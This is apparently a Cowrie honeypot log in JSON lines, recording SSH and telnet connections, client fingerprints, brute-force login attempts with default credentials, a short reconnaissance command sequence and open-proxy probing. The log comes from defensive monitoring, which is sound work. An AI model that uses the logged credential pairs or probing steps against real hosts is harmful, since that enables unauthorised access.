{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-24T18:46:17.341038Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T18:46:17.342298Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-24T18:46:17.344373Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-24T18:46:17.345785Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-24T18:46:17.347326Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-24T18:46:17.348290Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-24T18:46:17.349760Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-24T18:46:17.350934Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-24T18:46:17.443855Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:46:17.444865Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:46:17.766419Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":45436,"dst_ip":"1.2.3.4","dst_port":22,"session":"72e47d3ed42a","protocol":"ssh","message":"New connection: 92.118.39.71:45436 (1.2.3.4:22) [session: 72e47d3ed42a]","sensor":"my-vps","timestamp":"2025-08-24T18:46:27.803746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:46:27.804766Z","src_ip":"92.118.39.71","session":"72e47d3ed42a"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T18:46:27.835556Z","src_ip":"92.118.39.71","session":"72e47d3ed42a"}
{"eventid":"cowrie.login.failed","username":"validator","password":"validator","message":"login attempt [validator/validator] failed","sensor":"my-vps","timestamp":"2025-08-24T18:46:27.927999Z","src_ip":"92.118.39.71","session":"72e47d3ed42a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:46:28.969207Z","src_ip":"92.118.39.71","session":"72e47d3ed42a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53490,"dst_ip":"1.2.3.4","dst_port":22,"session":"70b65c52c2bb","protocol":"ssh","message":"New connection: 217.72.205.35:53490 (1.2.3.4:22) [session: 70b65c52c2bb]","sensor":"my-vps","timestamp":"2025-08-24T18:47:42.177658Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:47:42.179012Z","src_ip":"217.72.205.35","session":"70b65c52c2bb"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":37926,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6fcf5fc19d8","protocol":"ssh","message":"New connection: 45.88.8.186:37926 (1.2.3.4:22) [session: c6fcf5fc19d8]","sensor":"my-vps","timestamp":"2025-08-24T18:52:06.978224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:52:07.439637Z","src_ip":"45.88.8.186","session":"c6fcf5fc19d8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T18:52:07.440370Z","src_ip":"45.88.8.186","session":"c6fcf5fc19d8"}
{"eventid":"cowrie.login.success","username":"root","password":"7758258","message":"login attempt [root/7758258] succeeded","sensor":"my-vps","timestamp":"2025-08-24T18:52:10.451875Z","src_ip":"45.88.8.186","session":"c6fcf5fc19d8"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:52:11.289921Z","src_ip":"45.88.8.186","session":"c6fcf5fc19d8"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":51186,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5997652a314","protocol":"ssh","message":"New connection: 92.118.39.71:51186 (1.2.3.4:22) [session: d5997652a314]","sensor":"my-vps","timestamp":"2025-08-24T18:53:04.731926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:53:04.732943Z","src_ip":"92.118.39.71","session":"d5997652a314"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T18:53:04.762874Z","src_ip":"92.118.39.71","session":"d5997652a314"}
{"eventid":"cowrie.login.failed","username":"node","password":"node","message":"login attempt [node/node] failed","sensor":"my-vps","timestamp":"2025-08-24T18:53:04.857016Z","src_ip":"92.118.39.71","session":"d5997652a314"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:53:05.891082Z","src_ip":"92.118.39.71","session":"d5997652a314"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63210,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ccc510518ad","protocol":"ssh","message":"New connection: 217.72.205.35:63210 (1.2.3.4:22) [session: 0ccc510518ad]","sensor":"my-vps","timestamp":"2025-08-24T18:54:18.943848Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:54:18.944854Z","src_ip":"217.72.205.35","session":"0ccc510518ad"}
{"eventid":"cowrie.session.connect","src_ip":"193.105.134.95","src_port":27496,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ceff6cc09e8","protocol":"ssh","message":"New connection: 193.105.134.95:27496 (1.2.3.4:22) [session: 0ceff6cc09e8]","sensor":"my-vps","timestamp":"2025-08-24T18:55:51.018937Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PuTTY_Release_0.62","message":"Remote SSH version: SSH-2.0-PuTTY_Release_0.62","sensor":"my-vps","timestamp":"2025-08-24T18:55:51.019780Z","src_ip":"193.105.134.95","session":"0ceff6cc09e8"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-24T18:55:51.065057Z","src_ip":"193.105.134.95","session":"0ceff6cc09e8"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-24T18:55:51.993009Z","src_ip":"193.105.134.95","session":"0ceff6cc09e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"193.105.134.95","src_port":29868,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:29868","sensor":"my-vps","timestamp":"2025-08-24T18:55:52.038527Z","session":"0ceff6cc09e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-24T18:55:52.083706Z","src_ip":"193.105.134.95","session":"0ceff6cc09e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":30408,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:30408","sensor":"my-vps","timestamp":"2025-08-24T18:55:52.215334Z","session":"0ceff6cc09e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-24T18:55:52.260167Z","src_ip":"193.105.134.95","session":"0ceff6cc09e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"193.105.134.95","src_port":22403,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:22403","sensor":"my-vps","timestamp":"2025-08-24T18:55:52.391348Z","session":"0ceff6cc09e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-24T18:55:52.436576Z","src_ip":"193.105.134.95","session":"0ceff6cc09e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":1582,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:1582","sensor":"my-vps","timestamp":"2025-08-24T18:55:52.567404Z","session":"0ceff6cc09e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-24T18:55:52.612574Z","src_ip":"193.105.134.95","session":"0ceff6cc09e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"193.105.134.95","src_port":9113,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:9113","sensor":"my-vps","timestamp":"2025-08-24T18:55:52.743438Z","session":"0ceff6cc09e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-24T18:55:52.788690Z","src_ip":"193.105.134.95","session":"0ceff6cc09e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"193.105.134.95","src_port":26037,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:26037","sensor":"my-vps","timestamp":"2025-08-24T18:55:52.919182Z","session":"0ceff6cc09e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-24T18:55:52.964226Z","src_ip":"193.105.134.95","session":"0ceff6cc09e8"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:55:53.010275Z","src_ip":"193.105.134.95","session":"0ceff6cc09e8"}
{"eventid":"cowrie.session.connect","src_ip":"45.33.80.243","src_port":7308,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe2ab900ad39","protocol":"ssh","message":"New connection: 45.33.80.243:7308 (1.2.3.4:22) [session: fe2ab900ad39]","sensor":"my-vps","timestamp":"2025-08-24T18:56:07.979475Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-24T18:56:07.980696Z","src_ip":"45.33.80.243","session":"fe2ab900ad39"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:56:07.981588Z","src_ip":"45.33.80.243","session":"fe2ab900ad39"}
{"eventid":"cowrie.session.connect","src_ip":"45.33.80.243","src_port":7322,"dst_ip":"1.2.3.4","dst_port":22,"session":"923909ded520","protocol":"ssh","message":"New connection: 45.33.80.243:7322 (1.2.3.4:22) [session: 923909ded520]","sensor":"my-vps","timestamp":"2025-08-24T18:56:08.180462Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003_`:m5\tg\\xc9\u03f5(\u02e1{r8/\\xf9\u0017\\xd6\u27d4\\xf5\\xbd\\xf81\\xd6\\xfbT\\xf8\\xdd\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003_`:m5\tg\\xc9\u03f5(\u02e1{r8/\\xf9\u0017\\xd6\u27d4\\xf5\\xbd\\xf81\\xd6\\xfbT\\xf8\\xdd\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-24T18:56:08.181649Z","src_ip":"45.33.80.243","session":"923909ded520"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:56:08.182558Z","src_ip":"45.33.80.243","session":"923909ded520"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":56938,"dst_ip":"1.2.3.4","dst_port":22,"session":"331595fbc25d","protocol":"ssh","message":"New connection: 92.118.39.71:56938 (1.2.3.4:22) [session: 331595fbc25d]","sensor":"my-vps","timestamp":"2025-08-24T18:59:43.253710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:59:43.255277Z","src_ip":"92.118.39.71","session":"331595fbc25d"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T18:59:43.287347Z","src_ip":"92.118.39.71","session":"331595fbc25d"}
{"eventid":"cowrie.login.failed","username":"solana","password":"sol","message":"login attempt [solana/sol] failed","sensor":"my-vps","timestamp":"2025-08-24T18:59:43.379006Z","src_ip":"92.118.39.71","session":"331595fbc25d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:59:44.411160Z","src_ip":"92.118.39.71","session":"331595fbc25d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52170,"dst_ip":"1.2.3.4","dst_port":22,"session":"aeea83e5bf07","protocol":"ssh","message":"New connection: 217.72.205.35:52170 (1.2.3.4:22) [session: aeea83e5bf07]","sensor":"my-vps","timestamp":"2025-08-24T19:01:03.679038Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:01:03.680244Z","src_ip":"217.72.205.35","session":"aeea83e5bf07"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":56947,"dst_ip":"1.2.3.4","dst_port":23,"session":"bc60202e1bc1","protocol":"telnet","message":"New connection: 218.1.218.143:56947 (1.2.3.4:23) [session: bc60202e1bc1]","sensor":"my-vps","timestamp":"2025-08-24T19:01:09.758349Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":56955,"dst_ip":"1.2.3.4","dst_port":23,"session":"a672f7bab6bb","protocol":"telnet","message":"New connection: 218.1.218.143:56955 (1.2.3.4:23) [session: a672f7bab6bb]","sensor":"my-vps","timestamp":"2025-08-24T19:01:11.859800Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":56968,"dst_ip":"1.2.3.4","dst_port":23,"session":"7924e9fb1603","protocol":"telnet","message":"New connection: 218.1.218.143:56968 (1.2.3.4:23) [session: 7924e9fb1603]","sensor":"my-vps","timestamp":"2025-08-24T19:01:13.278885Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":56989,"dst_ip":"1.2.3.4","dst_port":23,"session":"a551dd3a6dd9","protocol":"telnet","message":"New connection: 218.1.218.143:56989 (1.2.3.4:23) [session: a551dd3a6dd9]","sensor":"my-vps","timestamp":"2025-08-24T19:01:16.971708Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":57034,"dst_ip":"1.2.3.4","dst_port":23,"session":"fd262bd19119","protocol":"telnet","message":"New connection: 218.1.218.143:57034 (1.2.3.4:23) [session: fd262bd19119]","sensor":"my-vps","timestamp":"2025-08-24T19:01:25.156646Z"}
{"eventid":"cowrie.session.closed","duration":44.381874799728394,"message":"Connection lost after 44 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:01:54.139392Z","src_ip":"218.1.218.143","session":"bc60202e1bc1"}
{"eventid":"cowrie.session.closed","duration":42.1331946849823,"message":"Connection lost after 42 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:01:55.412009Z","src_ip":"218.1.218.143","session":"7924e9fb1603"}
{"eventid":"cowrie.session.closed","duration":37.43140983581543,"message":"Connection lost after 37 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:02:02.587986Z","src_ip":"218.1.218.143","session":"fd262bd19119"}
{"eventid":"cowrie.session.closed","duration":51.41653490066528,"message":"Connection lost after 51 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:02:03.276258Z","src_ip":"218.1.218.143","session":"a672f7bab6bb"}
{"eventid":"cowrie.session.closed","duration":60.680076122283936,"message":"Connection lost after 60 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:02:17.651714Z","src_ip":"218.1.218.143","session":"a551dd3a6dd9"}
{"eventid":"cowrie.session.connect","src_ip":"103.122.61.228","src_port":39847,"dst_ip":"1.2.3.4","dst_port":23,"session":"e5917893886b","protocol":"telnet","message":"New connection: 103.122.61.228:39847 (1.2.3.4:23) [session: e5917893886b]","sensor":"my-vps","timestamp":"2025-08-24T19:05:06.320085Z"}
{"eventid":"cowrie.session.closed","duration":0.0014088153839111328,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:05:06.321387Z","src_ip":"103.122.61.228","session":"e5917893886b"}
{"eventid":"cowrie.session.connect","src_ip":"103.122.61.228","src_port":39848,"dst_ip":"1.2.3.4","dst_port":23,"session":"8193a9785874","protocol":"telnet","message":"New connection: 103.122.61.228:39848 (1.2.3.4:23) [session: 8193a9785874]","sensor":"my-vps","timestamp":"2025-08-24T19:05:06.454943Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"888888","message":"login attempt [admin/888888] failed","sensor":"my-vps","timestamp":"2025-08-24T19:05:07.102585Z","src_ip":"103.122.61.228","session":"8193a9785874"}
{"eventid":"cowrie.session.closed","duration":0.836219072341919,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-24T19:05:07.291088Z","src_ip":"103.122.61.228","session":"8193a9785874"}
{"eventid":"cowrie.session.connect","src_ip":"103.122.61.228","src_port":39852,"dst_ip":"1.2.3.4","dst_port":23,"session":"82d9640dd8d3","protocol":"telnet","message":"New connection: 103.122.61.228:39852 (1.2.3.4:23) [session: 82d9640dd8d3]","sensor":"my-vps","timestamp":"2025-08-24T19:05:07.449362Z"}
